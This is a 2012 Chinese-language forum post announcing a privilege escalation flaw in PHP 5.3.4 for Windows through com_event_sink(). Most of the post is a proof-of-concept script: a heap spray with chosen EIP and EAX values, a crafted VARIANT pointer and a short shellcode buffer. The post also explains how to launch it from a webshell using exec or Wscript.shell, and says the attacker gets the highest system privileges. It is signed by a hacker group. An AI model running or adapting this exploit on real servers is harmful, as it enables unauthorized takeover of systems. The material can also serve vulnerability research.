灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:3098回复:0

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

楼主#
更多 发布于:2012-11-09 18:08

PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中测试方法如下:cmd /c x:\php\php.exe x:\test.php

下载php程序至本地,然后使用php.exe解析php即可。webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php

这里是两个测试的截图:

图片:20121109104613786.png

成功利用此漏洞的攻击者将获得系统的最高权限

图片:20121109104614407.jpg

关于漏洞分析稍后附上。一下是PoC代码:

<?php

//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞

//$eip ="\x44\x43\x42\x41";

$eip= "\x4b\xe8\x57\x78";

$eax ="\x80\x01\x8d\x04";

$deodrant="";

$axespray = str_repeat($eip.$eax,0x80);

//048d0190 www.atcpu.com

echo strlen($axespray);

echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";

echo "Silic Group Hacker Army - BlackBap.Org";

//19200 ==4B32 4b00

for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}

$terminate = "T";

$u[] =$deodrant;

$r[] =$deodrant.$terminate;

$a[] =$deodrant.$terminate;

$s[] =$deodrant.$terminate;

//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的

$vVar = new VARIANT(0x048d0000+180);

//弹窗代码(Shellcode)

$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";

$var2 = new VARIANT(0x41414242);

com_event_sink($vVar,$var2,$buffer);

?>


喜欢0 评分0
游客

返回顶部